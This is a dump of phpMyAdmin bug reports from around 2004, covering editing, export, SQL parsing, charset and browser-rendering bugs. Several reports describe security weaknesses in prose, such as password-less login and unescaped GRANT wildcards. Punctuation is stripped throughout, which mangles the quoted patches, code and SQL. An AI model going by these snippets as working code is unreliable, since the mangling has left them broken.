when browsing through a table that has TEXT type fields, it seems the second row displayed through the browse view), does not allow the user to edit that particular row.
It sounds strange yes, but the first row you can use the edit button fine and any other row except the second row.
I thought it may be some strange data in the table, but it is simple text in the TEXT fields.
Even if you delete the 2nd row, the 3rd row that was working, now becomes the 2nd row and does not allow editing.
After clicking edit, the page loads blank.
I have turned all errors on and only get these errors through PHP In phpmyadmin new libraries defines.lib.php, line 79 dl ) Unable to load dynamic library .
gd.so .
gd.so cannot open shared object file No such file or directory In phpmyadmin new tbl row delete.php, line 25 Undefined variable submit multIn phpmyadmin new tbl row delete.php, line 29 Undefined variable submit multIn phpmyadmin new libraries ob.lib.php, line 61 but these errors also show when successfully editing other rows.
When editing this same table and database using Version 2.3.0 of PMA, the page loads fine and u can edit any rows.
so seems to be only in these latest builds.
Relevant server details PHP 4.3.2 cgi) MySQL 3.23.58 Apache server Thanks for your help and if you need any more information please let me know.
Cheers Original URL https sourceforge.net p phpmyadmin bugs 1141 https sourceforge.net p phpmyadmin bugs 1141 Original author wrenware Found in version 2.5.6 rc2","bug"
"24444","7511","2.3.3 pl1) tbl replace.php causes IIS to consume memory.
On several occasions, when using the Insertion tool with the option of staying on the same page to insert more records), my development machine bogs down to a crawl.
When I pull up Task Manager to investigate, inetinfo.exe is consuming huge amounts of memory and growing.
The more it grows, the more the machine bogs.
I know the script I m executing is tbl replace.php.
The tables that I m inserting records into is extremely small, usually less than 150 records.
Checked the buzz on the web about inetinfo.exe goin nuts.
The C programmers are identifying programs with memory leaks.
Don t know if that helps.
Noticed that tbl replace.php has some nested loops.
Haven t had time to investigate on my own.
If you need any additional info, please e mail to dcr8on msn.com.
Be happy to make it happen for ya.
Original URL https sourceforge.net p phpmyadmin bugs 1142 https sourceforge.net p phpmyadmin bugs 1142 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7512","Browsing tables deselect database in left frame.
Hello!
I need this fix, please.
Everytime I browse a table, left list of tables from a selected DB disapear as no database is selected.
this came from previous version 2.5.5 as I noticed Thanks Crirus Original URL https sourceforge.net p phpmyadmin bugs 1143 https sourceforge.net p phpmyadmin bugs 1143 Original author crirus","bug"
"24444","7513","Undefined variable save filename .... Standart values Export Select All Save as file Save on server in ...
File name template DB [ G m d H M] v remember template ) Compression gziped Result I get a page with Notice Undefined variable save filename in phpbbadmin export.php on line 88 \ above 20 such lines Then Warning Cannot modify header information headers already sent by output started at phpbbadmin export.php 88) in phpbbadmin libraries header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at phpbbadmin export.php 88) in phpbbadmin libraries header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at phpbbadmin export.php 88) in phpbbadmin libraries header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at phpbbadmin export.php 88) in phpbbadmin libraries header http.inc.php on line 17 Warning Cannot modify header information headers already sent by output started at phpbbadmin export.php 88) in phpbbadmin libraries header http.inc.php on line 20 Original URL https sourceforge.net p phpmyadmin bugs 1144 https sourceforge.net p phpmyadmin bugs 1144 Original author makc666 Found in version 2.5.5 pl1","bug"
"24444","7514","undefined function pma sql iserror.
If MySQL server is down then i get this message apache mysql php version not necessary but, apache is 1.3.29, mysql is 4.0.17 and PHP is 4.3.5rc3) Welcome to phpMyAdmin 2.5.6 rc1 phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection.
You should check the host, username and password in config.inc.php and make sure that they correspond to the information given by the administrator of the MySQL server.
Fatal error Call to undefined function pma sqp iserror ) in c \work\pma\libraries\common.lib.php on line 488 Original URL https sourceforge.net p phpmyadmin bugs 1145 https sourceforge.net p phpmyadmin bugs 1145 Original author finsoft Found in version 2.5.6 rc1","bug"
"24444","7515","No text in Export type dropdown on Konqueror 3.1.4.
Hi, If you navigate to the Export page after login i.e.
Databases) ... displayed in database list, the Export type dropdown in the Data framebox) appears empty with INSERTUPDATEREPLACE to it s right under Konqueror 3.1.4 KDE 3.1.3.
The Export type dropdown does nothing when clicked.
I observed this for 2.5.6 rc1 also.
Operation with Mozilla is OK. Server FreeBSD 4.9 RELENG Apache 1.3.29 MySQL 4.0.18 PHP 4.3.4 phpMyAdmin 2.5.6 rc2 Client Mandrake 9.2 KDE 3.1.3 Konqueror 3.1.4 Regards, Neil Darlow M.Sc.
Original URL https sourceforge.net p phpmyadmin bugs 1146 https sourceforge.net p phpmyadmin bugs 1146 Original author ndarlow Found in version 2.5.6 rc2","bug"
"24444","7516","don t touch character set connection.
SELECT FROM `table` WHERE 1 AND `a` LIKE LIMIT 0 , 30 MySQL Return 1266 Illegal mix of collations gbk chinese ci,IMPLICIT) and utf8 general ci,COERCIBLE) for operation like remove line 86 of dbi mysql.dbi.lib.php mysql query SET SESSION character set connection = \ .
mysql charset .
\ ; , link); seems solve the problem before remove character set server gbk gbk character set system utf8 utf8 character set database gbk gbk character set client utf8 gbk character set connection utf8 gbk after remove character set server gbk gbk character set system utf8 utf8 character set database gbk gbk character set client utf8 gbk character set connection gbk gbk Original URL https sourceforge.net p phpmyadmin bugs 1147 https sourceforge.net p phpmyadmin bugs 1147 Original author xuefer Found in version Latest Git","bug"
"24444","7517","trailing extra character in pdf pages.php.
line 330 at http cvs.sourceforge.net viewcvs.
py phpmyadmin phpMyAdmin pdf pages.php?annotate=2.
7 echo lt;br gt; .
htmlspecialchars row[ Field ]) .
\n ;s has trailing s .
Original URL https sourceforge.net p phpmyadmin bugs 1149 https sourceforge.net p phpmyadmin bugs 1149 Original author alister","bug"
"24444","7518","2.5.5 pl1) Editing columns for large tables.
With a table that has a very high amount of collumns, it is not possible to edit values.
The page remains empty.
Here s the export of the structure of the table yes I know, it s stupidly big but it s not from one of my softwares).
I joined the structure of the table I tried to edit without the data just insert an empty row to test it).
Original URL https sourceforge.net p phpmyadmin bugs 1148 https sourceforge.net p phpmyadmin bugs 1148 Original author upsilon Found in version 2.5.5 pl1","bug"
"24444","7519","PMA SQP formatHtml PHP 4.3.2 Windows only?).
When i want to display the content of a table.
I click on the button Browse i have an error message 1064 You have an error in your SQL syntax near LIMIT 0, 30 at line 1 .
Because the query is empty i think).
In the file sql.php at line 98 after this statement sql query = PMA SQP formatHtml parsed sql, query only ); sql query is empty???!!
My configuration is Apache 1.3.27 it s the same with apache 2.0.44), php 4.3.2 RC2, mysql 3.23.49 it s the same with mysql 4.0.12), my os is windows xp in french.
With the version phpmyadmin 2.3.3 it s ok. ps wehre can find the bug 641765 Thank s for your great product and thank s for your response Rv Original URL https sourceforge.net p phpmyadmin bugs 1150 https sourceforge.net p phpmyadmin bugs 1150 Original author rv dubois Found in version 2.5.6 rc2","bug"
"24444","7520","Sqlparser hang when only is query.
query it just hang, eating more and more memory patch Index sqlparser.lib.php ========================================== ========================= RCS file cvsroot phpmyadmin phpMyAdmin libraries sqlparser .lib.php,v retrieving revision 2.7 diff u r2.7 sqlparser.lib.php sqlparser.lib.php 4 Feb 2004 20 14 19 0000 2.7 sqlparser.lib.php 26 Feb 2004 13 27 26 0000 267,6 267,7 ANSI style if c == ) || count2 1 lt; len) c == ) sql[ count2 1] == )) \ || count2 2 == len) c == ) sql[ count2 1] == ) || count2 2 lt; len) c == ) sql[ count2 1] == ) sql[ count2 2] == ) || sql[ count2 2] == \n )))) \{ count2 ; pos = 0; Original URL https sourceforge.net p phpmyadmin bugs 1151 https sourceforge.net p phpmyadmin bugs 1151 Original author xuefer","bug"
"24444","7521","says unknown table .
Create following tables ======== CREATE TABLE `events category` `ID` int 11) NOT NULL auto increment, `Created` datetime NOT NULL default 0000 00 00 00 00 00 , `LastEdit` timestamp 14) NOT NULL, `name` varchar 100) NOT NULL default , PRIMARY KEY `ID`) ) TYPE=MyISAM AUTO INCREMENT=5 ; INSERT INTO `events category` VALUES 1, 0000 00 00 00 00 00 , 20040211153603, Meetings ), 2, 0000 00 00 00 00 00 , 20040211153717, Car shows ), 3, 2004 02 28 03 10 27 , 20040227181027, Rolling Road ), 4, 2004 02 28 03 10 29 , 20040227181034, Race ); CREATE TABLE `events` `ID` int 11) NOT NULL auto increment, `Created` datetime NOT NULL default 0000 00 00 00 00 00 , `LastEdit` timestamp 14) NOT NULL, `category` varchar 100) NOT NULL default , `title` varchar 100) NOT NULL default , `country` varchar 100) NOT NULL default , `description` longtext NOT NULL, `author` varchar 100) NOT NULL default 0 , `author email` varchar 100) NOT NULL default , `start` datetime NOT NULL default 0000 00 00 00 00 00 , `end` datetime NOT NULL default 0000 00 00 00 00 00 , `location` varchar 100) NOT NULL default , `route description` longtext NOT NULL, `gallery` varchar 50) NOT NULL default , PRIMARY KEY `ID`) ) TYPE=MyISAM AUTO INCREMENT=6 ; INSERT INTO `events` VALUES 4, 2004 02 28 03 13 47 , 20040227181633, 3 , RR day southwest , England , Dyno Day where you can put your Coupe on the rollers and see how much power it is putting out.
, ScottB , test , 2004 03 20 08 45 00 , 2004 03 20 20 00 00 , Powerstation Cheltenham , Athelney Way\r\nBattledown Industrial Estate\r\nCheltenham\r\nGL52 6RT\r\n\r\nFrom the A417 Swindon \r\nAfter the long dual carrriageway blast and the roundabout and drop into Nettleton Bottom you come down a hill there is the Air Ballon pub on the left \r\nTurn RIGHT at the roundabout, then 1st LEFT onto the B4070 Signed Leckhampton) \r\nFollow this road until you start to drop down a hill into Cheltenham, At 30 limit then take 1st turning RIGHT into Old Bath Road the road has a keep left bollard).
If you\ ve hit a double mini r\ bout you\ ve gone too far \r\nStay on Old Bath Road straight over 3 mini r\ bouts) until you hit some traffic lights.
\r\nGo STRAIGHT OVER lights into Hales Road Russell Arms pub on right) \r\nAthelney Way is the 6th turning on the right Signed Battledown Ind Estate) \r\n\r\nFrom Junction 11 of the M5 \r\nHead into Cheltenham, past large GCHQ building on left) STRAIGHT OVER 2 roundabouts with traffic lights) and 1 set of lights with Shell garage on the right handy stop point if you\ re after Optimax).
All signed A40 \r\nAfter another set of lights note Police Station on right!)
you come to a large traffic island with petrol station on it, STRAIGHT OVER still signed A40) \r\nAt next island roundabout combination take SECOND EXIT signed A40 Hospital \r\nAt next lights large Tower Block on left) go STRAIGHT OVER staggered right left).
Still A40 \r\nGo past Hospital to mini roundabout TURN LEFT \r\nGo STRAIGHT OVER next lights into Hales Road Russell Arms pub on right) \r\nAthelney Way is the 6th turning on the right Signed Battledown Ind Estate) \r\n\r\nFrom the A40 East Oxford London M40) \r\nHeading into Cheltenham on the A40 beware of speed camera on hill past Dowdeswell Reservoir) \r\nContinue STRAIGHT ON through Charlton Kings \r\nAt traffic light junction with A435 Cirencester Road V shape with a church on your left) STRAIGHT ON \r\nAt next lights no left turn) TURN RIGHT into Hales Road signed Cheltenham Town Football Club) \r\nRussell Arms pub is on right \r\nAthelney Way is the 6th turning on the right Signed Battledown Ind Estate) , ), 5, 2004 02 28 03 16 44 , 20040227181655, 1 , test , testt , test , , , 2004 03 27 00 00 00 , 2004 03 27 00 00 00 , , , ); ======== Now do ======== SELECT events category.
, events.
FROM events category JOIN events ON events.category = events category.ID WHERE events.ID =1 ======== It will say unknown table events Original URL https sourceforge.net p phpmyadmin bugs 1153 https sourceforge.net p phpmyadmin bugs 1153 Original author kayjey Found in version 2.5.6 rc2","bug"
"24444","7522","Undefined offsets.
I see in left frame Notice Undefined offset 0 in ... left.php on line 474 that line contains while list table) = PMA DBI fetch row tables)) \{ Original URL https sourceforge.net p phpmyadmin bugs 1152 https sourceforge.net p phpmyadmin bugs 1152 Original author nijel Found in version Latest Git","bug"
"24444","7523","GRANT ...TO is broken.
if I enter a SQL Query like GRANT SELECT ON mydb.test TO user localhost then before the TO the space is missing, and MySQL shows an error.
But GRANT SELECT ON mydb.
TO user localhost works fine.
Original URL https sourceforge.net p phpmyadmin bugs 1154 https sourceforge.net p phpmyadmin bugs 1154 Original author anonymous Found in version 2.5.6","bug"
"24444","7524","Invalid escaping of in ENUMs.
A column named B is defined as ENUM , ).
If I select in the GUI, the query looks like UPDATE `table` SET `B` = 2B WHERE `id` = 1 LIMIT 1 ; MySQL doesn t undo the escaping und sets an empty string for the column B.
Thanks for help.
phpMyAdmin 2.5.6 rc2, 2.5.5 pl1 too PHP 4.1.2 MySQL 3.23.32 Original URL https sourceforge.net p phpmyadmin bugs 1155 https sourceforge.net p phpmyadmin bugs 1155 Original author harpax1209 Found in version 2.5.6 rc2","bug"
"24444","7525","DB selection shows the first database only.
The dropdown box in the left frame menu) for DB selection shows the first database N times, where N is the total number of databases of the mysql server.
e.g.
if there are DBs abc xyz and fgh it displays abc abc abc in the dropdown box Versions phpMyAdmin 2.5.6 MySQL 4.0.13 php 4.3.4 configure options .
configure prefix= usr local enable pcntl enable ftp with zlib dir= usr local with mysql with pgsql with openssl= usr local with gd with apxs= usr local apache bin apxs with jpeg dir= usr local ) i installed phpMyAdmin 2.5.3 then and that error was gone but another emerged when i selected one DB from the dropdown box, the first Table name was displayed M times in the left menu ) frame, where M is the number of tables in that DB.
same error as above only with tables) i reproduced the table error in 2.5.6, too with using the SQL Query Window to manually select a Database after that.
so both bugs are in 2.5.6 the main window works fine!
its only the menu frame to the left!
screenshot attached... Johannes lt;j herlit informatik.uni kl.de gt; Original URL https sourceforge.net p phpmyadmin bugs 1156 https sourceforge.net p phpmyadmin bugs 1156 Original author anonymous Found in version 2.5.6 rc2","bug"
"24444","7526","BUG while Insert NULL in VARCHAR field.
Hi, I came found the following bug feature?
E.g., a simple Table with just one field table name VARCHAR 32) ) or something like this.
If we are using myadm insert funktion to fill in the requiered data and use NULL, Null, null or any other camelcaps null term, we get an Error, because NULL don t get s escaped to NULL .
Maybe this is not realy a BUG, because it s a reserved term, but if I use the webfrontend to insert NULL as term.
I guess I should be escaped.
Naden nb \{at\} naden.de Original URL https sourceforge.net p phpmyadmin bugs 1158 https sourceforge.net p phpmyadmin bugs 1158 Original author anonymous","bug"
"24444","7527","CREATE Statement with floating point type.
If you run the following query CREATE TABLE IF NOT EXISTS shop settings Setting Nr INT NOT NULL AUTO INCREMENT, MwStsatz DOUBLE NOT NULL DEFAULT 7.6, PRIMARY KEY Setting Nr), UNIQUE UC Setting Nr Setting Nr) ) TYPE=MyISAM COMMENT= Shop settings ; It will result in the following error, even though the syntax is ok SQL Query CREATE TABLE IF NOT EXISTS shop settings Setting Nr INT NOT NULL AUTO INCREMENT , MwStsatz DOUBLE NOT NULL DEFAULT7.6, PRIMARY KEY Setting Nr ) , UNIQUE UC Setting Nr Setting Nr ) ) TYPE = MYISAM COMMENT = Shopeinstellungen MySQL message 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near DEFAULT7.6, PRIMARY KEY Setting Nr ) , UNIQUE UC Setting N If you instead save the query into a file and use mysql u ... p dbname lt; filename the query will be accepted by the MySQL dbms.
Unfortunately I can t submit a pretty print result, but it looks like if after DEFAULT the number 7 from the 7.6 floating number is not been recognized maybe this prevents the query from being processed successfully.
I found out, that if you remove the .6 the query runs throug with no problems... Also mysterious is, that if you use another SQL command before the above mentioned query, phpMyAdmin will also accept the query from above, e.g.
USE shop db; CREATE TABLE IF NOT EXISTS shop settings Setting Nr INT NOT NULL AUTO INCREMENT, MwStsatz DOUBLE NOT NULL DEFAULT 7.6, PRIMARY KEY Setting Nr), UNIQUE UC Setting Nr Setting Nr) ) TYPE=MyISAM COMMENT= Shopeinstellungen ; ... didn t result in an error message...
I tested this with phpMyAdmin 2.4.0, 2.5.4, 2.5.6, PHP 4.3.3 SuSE Linux 9.0), 4.2.2 SuSE Linux 8.2) standard PHP configuration nothing fancy e.g.
magic quotes gpc=On, ..., MySQL 4.0.15, 3.23.55 log) Maybe it isn t a bug in phpMyAdmin but if it is so, I hope I could help keep up the great work ) Josxc3xa9 Fontanil www.phpeppershop.com Original URL https sourceforge.net p phpmyadmin bugs 1160 https sourceforge.net p phpmyadmin bugs 1160 Original author fontajos Found in version 2.5.6 rc2","bug"
"24444","7528",".bz2 insert issues.
Info MySQL 4.1.1 Alpha phpMyAdmin 2.5.6 rc2 apache 2.48 php 4 4.3.4 2,1 OS FreeBSD 5.2 when large data is exported via .bz2 format and then imported into a new db, first 203 commands or so get run and imports limited data and that is it.
No error messages.
however, if the same data saved with no compression or with the gzip format import works fine.
all rows of data imported.
No error messages are displayed Mysql and php default values have been increased for larger file sizes.
The key here is that .gz and .sql file for the same data work fine.
Original URL https sourceforge.net p phpmyadmin bugs 1162 https sourceforge.net p phpmyadmin bugs 1162 Original author machk Found in version 2.5.6 rc2","bug"
"24444","7529","wont show controls for table edit, delete).
its been a while im playin around with pma and couldnt solve this problem yet configs are all ok same config and full packege works on my local machine).
so wont show the query results edit delete etc.. controls on left nor right.
in config i set the cfg[ ModifyDeleteAtLeft ] = TRUE; and by var dumping found out that sql.php doesnt pass result value to PMA DisplayTable db results....) callin function result is mysql resource but in function its NULL.
same test on my local mashine mysql resource value in function and thus shows controls.
pma 2.5.6 latest release local mashine apache 2xx mysql 4.01 on windows remote apache dont know the version.
mysql 4.01 on freebsd 5.xx i work on mysql with root.
so got all permissions.
i just copy the entire thing from local to remote and everythin but controls works.
absalute path tried as well, didnt work.
any suggestion?
it got me really thanx vemod gmx.net dave Original URL https sourceforge.net p phpmyadmin bugs 1157 https sourceforge.net p phpmyadmin bugs 1157 Original author anonymous","bug"
"24444","7530","On fly compression breaks output.
I use option Save as file Save on server in DB [ G m d H M] So when I set Compression zipped all when ok.
I get a good ZIP file test [2004 03 04 14 43].sql.zip 3,710 KB 3,799,205 bytes) and all inside ok.
BUT!!
When I set Compression gzipped I get the file which is only 154 KB 157,383 bytes) or 154 KB 157,535 bytes) Always near these values.
Inside test [2004 03 04 14 52].sql.gz All begins as normal =================== phpMyAdmin SQL Dump version 2.5.6 http www.phpmyadmin.net Host localhost Generation Time Mar 04, 2004 at 02 34 PM Server version 3.23.55 PHP Version 4.3.4 Database `test` Table structure for table `OLD rate` =================== And so on.
But then on one of the lines it breakes.
Every time the lines are different.
One more thing.
The files inside test [2004 03 04 14 52].sql.gz is test.sql and it is about 7 Kb.
As the gzipped is 154 KB.
That it.
P.S.
In Group ?)
there is no 2.5.6.
Only 2.5.6 rc2 Fix it please.
Original URL https sourceforge.net p phpmyadmin bugs 1159 https sourceforge.net p phpmyadmin bugs 1159 Original author makc666 Found in version 2.5.6","bug"
"24444","7531","Delete link after database search.
Searching whole database gives some matches along with two links Browse and Delete .
Klicking Delete link is without function.
Peter Original URL https sourceforge.net p phpmyadmin bugs 1166 https sourceforge.net p phpmyadmin bugs 1166 Original author mandabaer Found in version 2.5.6","bug"
"24444","7532","Incorrectly cutted strings in preview.
Hello, I use UTF 8 encoding.
phpMyAdmin displays database contents as incorrectly cutted.
Actually, the reason is not in phpMyAdmin but in wrong use of substr ) function.
Here is my solution Corrections for common.lib.php Returns the portion of string specified by the start and length parameters.
param string the string to cut param int Start position, positive return int Lenght, positive return string Cutted string access public function PMA substr t, start = 0, length = 0) \{ if function exists mb substr ) ini get mbstring.internal encoding ) == UTF 8 ) \{ return mb substr t, start, length, UTF 8 ); \} return substr t, start, length); \} Corrections for display tbl.lib.php Line 1386 row[ pointer] = PMA substr row[ pointer], 0, GLOBALS[ cfg ][ LimitChars ]) .
... ; See attached file, how it works.
Without this bugfix, Mozilla returns just incorrect characters, IE returns an unpredictable results, including the breaking of HTML code.
The amount of displayed characters is incorrect too, it differs from GLOBALS[ cfg ][ LimitChars ].
Original URL https sourceforge.net p phpmyadmin bugs 1161 https sourceforge.net p phpmyadmin bugs 1161 Original author yrtimd Found in version 2.5.6","bug"
"24444","7533","Problem while editing big tables structure.
When you try to edit a field structure or many fields structure from a big table big structure, not big content .... the one I use is a 109 fields height ), the edition page does not display correctly, the page stay empty .... the code study shows unachieved html code ....
I ve noticed this bug in 2.5.5 and 2.5.6 versions.
I ve not tested that in older versions.
the tools used linux box apache 1.3.29 php 4.3.4 MySQL 4.0.18 good work, Arnaud Original URL https sourceforge.net p phpmyadmin bugs 1163 https sourceforge.net p phpmyadmin bugs 1163 Original author stc Found in version 2.5.6","bug"
"24444","7534","UPDATE option in export does not work.
Update option doe data export do not generate WHERE clause.
i.e.
instead of UPDATE foo set id=123, a= 123 where id=123; we see UPDATE foo set id=123, a= 123 ; Original URL https sourceforge.net p phpmyadmin bugs 1170 https sourceforge.net p phpmyadmin bugs 1170 Original author anonymous Found in version 2.5.5 pl1","bug"
"24444","7535","firefox firebird blank page in versions gt;2.2.0.
I might have a problem with my firebird firefox installations.
I use win32 firebird 0.7 and firefox 0.8.
Now, in IE 5.5 and Mozilla 1.5, all phpMyAdmin versions from 2.2.0 onwards render fine in my browser.
However, firebird 0.7 and firefox 0.8 only display a blank page for phpMyAdmin version 2.3.0 onwards.
Actually, 2.2.0 renders okay in firebird firefox.
phpMyAdmin 2.3.0 rc4 displays vertical frame sizer bar but with blank frames phpMyAdmin 2.5.0 rc2 displays vertical frame sizer bar but with blank frames phpMyAdmin 2.5.5 pl1 displays completely blank page phpMyAdmin 2.5.6 displays completely blank page Inspecting the page source from 2.5.6 shows what I expect the frame HTML code.
Inspecting the page source for left.php shows [!DOCTYPE html PUBLIC W3C DTD HTML 4.01 Transitional EN ][html][head][title][ title][ head][body][ body][ html] square brackets substitute angle brackets).
main.php does the same.
Yet on Mozilla or IE left.php returns the nicely rendered menu bar.
I am running phpMyAdmin 2.5.6 on debian linux woody rc2 i386) php v4.1.2 Server version Apache 1.3.26 Unix) Debian GNU Linux mysql Ver 11.16 Distrib 3.23.49, for pc linux gnu i686) I have seen phpMyAdmin 2.4.0 render fine on my firefox browser when connecting to the administration pages on www.ipowerweb.com s commercial web services.
They run mysql version 4.x.
The strange thing is that all phpMyAdmin versions render with no problems on IE and Mozilla.
It s just firebird firefox that have no content HTML produced for them..
Original URL https sourceforge.net p phpmyadmin bugs 1171 https sourceforge.net p phpmyadmin bugs 1171 Original author time Found in version 2.5.6","bug"
"24444","7536","multi edit wrong tabindex and id.
tabindex and id should be unique in the multi edit form.
Original URL https sourceforge.net p phpmyadmin bugs 1164 https sourceforge.net p phpmyadmin bugs 1164 Original author lem9 Found in version 2.5.6","bug"
"24444","7537","Empty Table Deleted Row Count = 0.
Version 3.23.32 When emptying a table by clicking on the Empty tab I haven t tried it with an SQL input), the returned deleted row count is always zero.
Deleted rows 0 Not scarily important, I grant you, but it won t take long to change ;o) Original URL https sourceforge.net p phpmyadmin bugs 1165 https sourceforge.net p phpmyadmin bugs 1165 Original author grimmeh","bug"
"24444","7538","Login with no password.
I have phpMyAdmin setup on a couple different servers, and on all of them you can login without a password.
You have to select a username not in use, and leave the password blank.
It then lets you in, but with no privileges and no databases in the list.
If I attempt with a username already in exsitence, it fails the login like expected.
I am using cookie authentication and using version 2.5.2 pl1.
Original URL https sourceforge.net p phpmyadmin bugs 1167 https sourceforge.net p phpmyadmin bugs 1167 Original author ericwolfe Found in version 2.5.2 pl1","bug"
"24444","7539","CSV export and double byte characters.
File libraries export csv.php Line 144 Line Content row[ j] = stripslashes row[ j]); I am using Double Byte word Chinese Big5 ) that including slashes.
So this line strip my word s slash and broken some words.
So I think it s a bug because I take stripslashes off then export all right.
Original URL https sourceforge.net p phpmyadmin bugs 1168 https sourceforge.net p phpmyadmin bugs 1168 Original author doggy8088 Found in version 2.5.6","bug"
"24444","7540","SQL queries won t run PHP 4.3.2 Windows only?).
I am using phpMyAdmin 2.5.6.
Every time I tried to run a SQL query either importing from a file or writing in the box) I would get the reply Error MySQL said 1065 Query was empty After tracing variables I discovered that the line sql query = PMA SQP formatHtml parsed sql, query only ); in sql.php was producing the problem., i.e.
it was returning an empty string where the query should have been.
Afterwards I realised that this was fixed by adding the last two arguments sql query = PMA SQP formatHtml parsed sql, query only ,0, 1); I m not sure whether this is a bug in phpMyAdmin or a feature that is not properly supported by my php setup, but I thought you would like to know in case the problem struck someone else.
Cheers, Eduardo Original URL https sourceforge.net p phpmyadmin bugs 1169 https sourceforge.net p phpmyadmin bugs 1169 Original author eundas Found in version 2.5.6","bug"
"24444","7541","[pdf] Portrait Landscape don t work.
This problem is in versions 2.5.5 pl1 and 2.5.6 maybe others) When creating the PDF schema document no matter what setting is used for the Data Directory Format xc2x97portrait or landscape xc2x97 the schema is always landscape and all other pages are portrait pdf definition requires all pages to be of one orientation).
All pages in their default size will not fit within the boundaries of a single printed page thus requiring the entire print job to be scaled down prior to printing.
schema page is too wide, all other pages are too tall) How about adding the default orientation setting to the configuration file.
It would be nice if the user had control over the margins ie.
larger left margin for three hole punch), and customization of the header and footer content maybe to add a logo or programer name, e mail address, etc.).
Original URL https sourceforge.net p phpmyadmin bugs 1172 https sourceforge.net p phpmyadmin bugs 1172 Original author tdresel Found in version 2.5.6","bug"
"24444","7542","GRANT wildcards in databases.
Becouse the ` ` and ` ` wildcards can be in a database name, they should be escaped in GRANT.
For example when you select a database in the selectbox with a ` ` or ` ` wildcard in the database name, phpmyadmin doesn not escape those characters.
After performing such GRANT, the user will be able to add extra databases.
Original URL https sourceforge.net p phpmyadmin bugs 1173 https sourceforge.net p phpmyadmin bugs 1173 Original author ward85 Found in version 2.5.6","bug"
"24444","7543","optimize all tables.
it would be nice if there is a possibility to optimize all tables at once.
Original URL https sourceforge.net p phpmyadmin bugs 1174 https sourceforge.net p phpmyadmin bugs 1174 Original author dreeh Found in version 2.5.6","bug"
"24444","7544","icons and text not displayed for indexes editing.
Just a small note...
The iconic display works for the TRUE and FALSE settings under Indexes on tbl properties structure.php, but both setting in config.inc.php does not set up both text and icon.
Minor point, but I m being a stickler for good UI practices.
Chad Baus chadbaus ameritech.net www.chadbaus.com Original URL https sourceforge.net p phpmyadmin bugs 1175 https sourceforge.net p phpmyadmin bugs 1175 Original author anonymous","bug"
"24444","7545","Login Logout Not Working Properly.
Using phpMyAdmin 2.5.6, Apache web server.
When Log Out is selected, the username password dialog is displayed.
If the user then types in an incorrect username password combination, the session remains logged in as the previous user.
One would expect that, when Log Out is selected, a dialog would be presented to confirm log out.
If so, then the session would be terminated, and another screen would appear on the browser providing a link to the login screen again.
Original URL https sourceforge.net p phpmyadmin bugs 1176 https sourceforge.net p phpmyadmin bugs 1176 Original author emarzock Found in version 2.5.6","bug"
"24444","7546","XML Exports non valid charachters.
MySQL 4.0.14 standard Apache 1.3.27 Server Slackware Linux V9 this section does not validate because of the accents.
lt;apellido gt;Villalxc3xb3n lt; apellido gt; lt;nombres gt;Andrxc3xa9s y Carmen lt; nombres gt; Original URL https sourceforge.net p phpmyadmin bugs 1177 https sourceforge.net p phpmyadmin bugs 1177 Original author rbondi Found in version 2.5.3 rc3","bug"
"24444","7547","htmlentities ) forgotten in row edit row delete.
I ran this query on one of my tables SELECT node id FROM nodes WHERE created gt; 2004 01 01 AND created lt; 2004 04 01 I got my result set, but next to the row edit and row delete buttons part of the SQL query was shown.
Take a look at the source code lt;input type= submit name= submit mult value= row edit title= Edit gt; amp;nbsp; lt;input type= submit name= submit mult value= row delete title= Delete gt; lt;input type= hidden name= sql query value= SELECT node id FROM nodes WHERE created gt; 2004 01 01 AND created lt; 2004 04 01 gt; lt;input type= hidden name= pos value= 0 gt; lt;input type= hidden name= url query value= lang=en iso 8859 1 amp;amp;server=1 amp;amp;db=dev hach2 amp;amp; table=nodes amp;amp;pos=0 amp;amp;session max rows=100 amp;amp; disp direction=horizontal amp;amp;repeat cells=25 amp;amp; dontlimitchars=0 gt; See, somebody has forgotten to escape the special characters in the SQL query before putting it into the hidden input field.
Hey, why are those buttons called row edit and row delete anyway?
Shouldn t they have more user friendly and localized) names like Edit Row and Delete Row ?
It s annoying that you have Please log in!
AFTER this comment field, so that I m encouraged to first fill out the field, THEN click the login link, which of course causes the form contents to be lost.
Original URL https sourceforge.net p phpmyadmin bugs 1178 https sourceforge.net p phpmyadmin bugs 1178 Original author ryandesign Found in version 2.5.6","bug"
"24444","7548","Broken translations.
Parse error parse error in home groups p ph phpmyadmin htdocs phpMyAdmin l ang latvian utf 8.inc.php on line 728 Warning Cannot add header information headers already sent by output started at home groups p ph phpmyadmin htdocs phpMyAdmin l ang latvian utf 8.inc.php 728) in home groups p ph phpmyadmin htdocs phpMyAdmin i ndex.php on line 42 my email janis millenium.lv Original URL https sourceforge.net p phpmyadmin bugs 1179 https sourceforge.net p phpmyadmin bugs 1179 Original author anonymous Found in version Latest Git","bug"
"24444","7549","create priv detection bugfix 2.5.6. patch is also at item in patches 922051, this report also appears in patches 922048) .
main.php around line 236 When a user has access to a database called db\ something Mysql.db db), the SHOW GRANT based create database privilege detection code is not able determine that a database db something already exists, and therefore offers a create field to the user where none appears if the database is called dbsomething for instance.
Also, the backticks around the database name that you get back from a SHOW GRANT are not removed early enough in the code, thus possibly preventing the code from correctly interpreting database names that start with a wildcard | ).
The development version 2.6..) seems to have the same problem, but the attached patch can t be apply to it directly, as the dev version uses different database access primitives...
It would be cool if you could include that patch in the next release ;) Cheers, Thomas jacob a t internet24 d o t de Original URL https sourceforge.net p phpmyadmin bugs 1180 https sourceforge.net p phpmyadmin bugs 1180 Original author anonymous Found in version 2.5.6","bug"
"24444","7550","non existant bookmarktable leads to errors.
After CVS update I now get tons of Warning mysql fetch array ) supplied argument is not a valid MySQL result resource in libraries dbi mysql.dbi.lib.php on line 137 Original URL https sourceforge.net p phpmyadmin bugs 1181 https sourceforge.net p phpmyadmin bugs 1181 Original author nijel Found in version Latest Git","bug"
"24444","7551","apache2 child segfaults when I browse.
I am running RedHat Enterprise Linux 3ES apache 2.0.46 32.ent) php 4.3.2 8.ent) Since this comes without MySQL !
), I installed MySQL 4.0.18 I then rebuilt the php module php mysql to use the new client libraries from MySQL 4, specifically, it links to usr lib libmysqlclient.so.12 Now when I Select or Browse in phpmyadmin 2.5.6, the apache child process segfaults.
Also unable to run SQL queries get complaints about missing tables, and the returned query uppercases all table names.
